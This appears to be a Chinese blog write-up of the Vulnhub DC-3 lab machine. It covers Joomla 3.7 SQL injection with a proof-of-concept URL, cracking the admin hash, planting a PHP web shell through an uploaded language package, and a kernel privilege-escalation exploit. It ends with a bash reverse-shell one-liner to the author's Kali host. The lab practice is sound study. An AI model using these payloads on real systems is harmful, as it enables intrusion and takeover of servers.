Vulnhub靶机DC-3通关笔记
¶前言
乘热打铁继续做
下载地址:https://www.vulnhub.com/entry/dc-3,312/
¶开始
扫描端口
只有80端口开放
访问
只有一个flag 一个入口点没有线索
目标是拿到root权限
用whatweb看看是用什么写的
用的是Joomla!写的
用joomscan来扫描一下
https://github.com/rezasp/joomscan
版本是3.7
去搜索一下3.7的漏洞找到一个sql注入漏洞
https://firedebug.github.io/PHP/Joomla3.7.0SQL注入/
http://192.168.123.6/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
用poc试一下果然存在这个漏洞 还是root权限
在github找到个exp
https://github.com/stefanlucas/Exploit-Joomla
得到admin的hash
cmd5解不出来??
卡壳了
后来看了wp才知道要用kali自带的字典rockyou来解 好吧。。
我Macbook的hashcat好像破解不了这个blowfish密码 硬件不支持
我直接拿了wp的密码登陆了
接下来就是后台getshell
具体步骤参考
https://klionsec.github.io/2017/05/18/joomla-3-70-exp-getshell/
简单来说就是下载官方的模版
http://joomlacode.org/gf/download/frsrelease/20033/163761/zh-CN_joomla_lang_full_3.4.1v2.zip
在模版中加入shell.php
然后在install.xml中加入shell.php
打包上传
接着访问shell.php
http://192.168.123.6/administrator/language/zh-CN/shell.php
导入蚁剑就好了
是www-data权限现在的目标就是提权
ubuntu16.04的系统
找一下有没有本地权限提升的exp
找到一个符合的
Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ bpf(BPF_PROG_LOAD) Privilege Escalation
直接去下载exp
上传到/tmp目录
赋予执行权限
之后
./compile.sh
./doubleput
得到root权限
最终的flag
少了一步就是在蚁剑终端反弹shell到kali
bash -c ‘bash -i >& /dev/tcp/192.168.123.4/5555 0>&1’
kali终端
nc -lvvp 5555
¶总结
这次的渗透还是比较轻松的 主要是在密码破解上卡壳了 拿到了加密的blowfish在cmd5找不到就没招了,没有想到还能用hashcat来破解